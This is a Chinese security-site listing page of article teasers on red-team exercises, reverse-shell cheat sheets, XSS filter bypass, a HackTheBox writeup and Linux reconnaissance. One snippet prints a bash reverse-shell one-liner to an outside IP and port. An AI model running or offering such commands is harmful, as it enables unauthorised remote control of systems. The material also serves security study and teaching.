dev - 第 3 | CN-SEC 中文网

安全文章

记一次内部红蓝对抗

前言年前部门内有个模拟对抗的比赛，记录下当时的过程，感谢导师带我玩。渗透过程本身是一个试错的过程，所以只记录下过程中的有效步骤。给定目标为域名，通过openvpn访问，于是先对*.xxx.com进行子...

05月03日46 views评论

阅读全文

安全文章

反弹shell命令速查

项目作者：Threekiii 项目地址：https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E5%8F%8D%E5%...

05月03日119 views评论

阅读全文

安全文章

绕过 XSS 检测机制

介绍跨站点脚本 (XSS) 是最常见的 Web 应用程序漏洞之一。它可以通过清理用户输入、基于上下文转义...

04月29日27 views评论

阅读全文

安全文章

常用反弹shell方法总结

0x01 bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>&1解释：bash -i [interface] 表示启动sh...

04月25日1,123 views评论

阅读全文

Webpack系列-WebpackDevServer

作用 WebpackDevServer作用:0.运行一个服务器并运行与8080端口;1.实现自动打包 ;(代替npx webpack作用)安装 yarn add webpack-d...

04月24日安全工具58 views评论

阅读全文

CTF专场

hacktheboxRouterSpace writeup

一、信息收集0x01 端口扫描nmap -sS -sV -O 10.10.11.1480x02 访问web服务发现是一个路由器，进行目录爆破。0x03 目录爆破很遗憾，没有发现有用的目录。0x04 下...

04月20日194 views评论

阅读全文

安全漏洞

内核区域URL过滤漏洞影响三星Note 3、Galaxy S6(CNNVD-201601-618)

研究人员在三星的安卓内核中，找到了一个名为secfilter的模块。这个模块的initialization程序吸引了研究员的注意力，因为一些Netfilter hook在这里模块里被注册了...

04月10日51 views评论

阅读全文

安全闲碎

国内研究人员首次Wifi重大漏洞利用实现

点击上方“安全优佳” 可以订阅哦！弹出连接提示弹窗后，输入任意密码位数均可，尝试连接，目标wifi会被攻击，创造握手，目标wifi密钥会被重置成你设定的密钥，在iphone上可以看到有人不断连接和断开...

04月09日39 views评论

阅读全文

安全文章

【渗透笔记】Linux主机信息收集

系统架构# 打印系统信uname -a# 文件 /etc/issue是一个文本文件，其中包含要在登录提示之前打印的消息或系统标cat /etc/issue# /etc/lsb-release...

04月09日176 views评论

阅读全文

应急响应

亲身经历，云服务器遭遇挖矿病毒之后

一、事故现场：某天正常登录到服务器上，想做一些测试，正当我使用curl命令时，发现提示命令不存在，又测试了下wget命令，也是同样的情况，心里突然感觉到情况不妙。其它的一些如netstat、ps命令也...

04月07日120 views评论

阅读全文

安全闲碎

基础｜Linux 虚拟网络设备之 bridge

本文将通过实际的例子来一步一步解释bridge是如何工作的。什么是bridge？首先，bridge是一个虚拟网络设备，所以具有网络设备的特征，可以配置IP、MAC地址等；其次，bridge是一个虚拟交...

03月31日47 views评论

阅读全文

安全闲碎

教你快速清空Linux中的大文件

文章来源：云计算就该这么学1、通过重定向到null清空文件内容使用 shell 重定向null(不存在的对象)到文件的最简单方法来清空文件内容# > access...

03月28日50 views评论

阅读全文

记一次内部红蓝对抗

反弹shell命令速查

绕过 XSS 检测机制

常用反弹shell方法总结

Webpack系列-WebpackDevServer

hacktheboxRouterSpace writeup

内核区域URL过滤漏洞影响三星Note 3、Galaxy S6(CNNVD-201601-618)

国内研究人员首次Wifi重大漏洞利用实现

【渗透笔记】Linux主机信息收集

亲身经历，云服务器遭遇挖矿病毒之后

基础｜Linux 虚拟网络设备之 bridge

教你快速清空Linux中的大文件

在线咨询

微信